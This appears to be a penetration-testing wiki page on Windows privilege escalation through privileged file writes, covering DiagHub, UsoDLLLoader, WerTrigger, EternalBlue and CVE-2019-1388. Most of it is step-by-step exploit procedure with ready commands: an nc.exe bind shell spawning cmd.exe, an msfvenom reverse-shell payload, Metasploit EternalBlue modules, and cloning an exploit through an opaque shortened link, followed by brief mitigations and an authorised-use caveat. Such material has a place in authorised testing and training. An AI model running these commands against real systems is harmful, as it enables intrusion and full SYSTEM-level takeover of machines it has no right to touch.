EoP - Privileged File Write

Privilege Escalation via File Write Vulnerabilities on Windows

Overview

File write vulnerabilities in Windows can enable attackers to escalate privileges by executing arbitrary code with elevated permissions. Below are several methods and tools that exploit these vulnerabilities, along with steps for execution and associated warnings.

1. Microsoft Diagnostics Hub (DiagHub)

Description: The Microsoft Diagnostics Hub Standard Collector Service allows tracing and diagnostics. It can be exploited to load a malicious DLL into a SYSTEM process by placing the DLL in the C:\Windows\System32 directory.

Warning: As of Windows 1903 and later, this exploit is no longer effective due to security enhancements.

Exploit Steps:

  1. Create the Malicious DLL:

    • Build a malicious DLL (e.g., payload.dll).

    • Place payload.dll in C:\Windows\System32.

  2. Build the Loader:

    • Download and build the loader from the relevant GitHub repository.

  3. Execute the Payload:

    diaghub.exe c:\\ProgramData\\payload.dll

    Payload Example:

    C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe

2. UsoDLLLoader

Description: Exploits privileged file write vulnerabilities to replace windowscoredeviceinfo.dll for SYSTEM-level execution.

Warning: This method is ineffective in the latest Windows 10 Insider Preview builds (as of June 2020).

Exploit Steps:

  1. Build the Loader:

    • Download and build the loader.

    • Output:

      • WindowsCoreDeviceInfo.dll (malicious DLL).

      • UsoDllLoader.exe (loader executable).

  2. Copy the DLL:

    • Move WindowsCoreDeviceInfo.dll to C:\Windows\System32.

  3. Execute the Loader:

    UsoDllLoader.exe

    Alternatively:

    usoclient StartInteractiveScan

  4. Connect to the Shell:

    • Bind shell typically listens on port 1337.

3. WerTrigger

Description: Leverages Windows Problem Reporting to exploit privileged file write bugs for SYSTEM privilege escalation.

Exploit Steps:

  1. Clone the Repository:

    • Clone the WerTrigger project from GitHub.

  2. Prepare the Payload:

    • Copy phoneinfo.dll to C:\Windows\System32.

    • Place Report.wer and WerTrigger.exe in the same directory.

  3. Execute the Exploit:

    WerTrigger.exe

  4. Result:

    • Opens a shell with NT AUTHORITY\SYSTEM privileges.

4. WerMgr

Description: Exploits Windows Error Reporting (WER) for privileged directory creation and SYSTEM-level code execution.

Usage:

  • Similar to WerTrigger, but may require payload customization based on the environment.

5. Exploitation via SMB Vulnerabilities

SMB vulnerabilities, such as EternalBlue and related exploits, are used for privilege escalation and lateral movement.

Exploit Steps:

  1. Scan for Vulnerabilities:

    nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <ip_netblock>

  2. Using Metasploit:

    • EternalBlue exploit:

      use exploit/windows/smb/ms17_010_eternalblue

    • Vulnerability Scanner:

      use auxiliary/scanner/smb/smb_ms17_010

  3. Manual Exploitation:

    • Clone the exploit repository:

      git clone https://tinyurl.com/2ccy84d8

    • Generate a reverse shell:

      msfvenom -p windows/shell_reverse_tcp LHOST=<your_IP> LPORT=443 -f exe > revshell.exe

    • Execute the exploit:

      python2 send_and_execute.py <target_IP> revshell.exe

6. CVE-2019-1388

Description: A known privilege escalation vulnerability affecting specific Windows builds.

Targeted Versions:

  • Windows 7 and Windows 10 LTSC 10240.

Exploit Steps:

  1. Identify the target system version.

  2. Use a specialized exploit for this CVE.

  3. Escalate privileges to NT AUTHORITY\SYSTEM.

Warnings and Considerations

  • Effectiveness: Some techniques may not work on the latest Windows versions due to patches or updated security configurations.

  • Legal Use: These methods should only be used in authorized penetration testing environments.

  • Detection Risks: Many of these exploits generate logs or leave traces that can trigger alerts in properly monitored systems.

Mitigation Strategies

  1. Apply Security Patches:

    • Regularly update Windows to mitigate known vulnerabilities.

  2. Restrict Privileged Access:

    • Limit access to SYSTEM directories and sensitive files.

  3. Monitor System Changes:

    • Use tools like Sysmon to track DLL loading and file writes in critical directories.

  4. Network Segmentation:

    • Restrict SMB access to trusted systems only.

  5. Regular Audits:

    • Perform frequent security audits to identify misconfigurations and vulnerable software.

Conclusion

Privilege escalation through file write vulnerabilities is a critical risk in Windows environments. Understanding these exploitation methods and implementing mitigation strategies are vital for securing systems against unauthorized privilege elevation.

PreviousEoP - Impersonation PrivilegesNextReferences

Last updated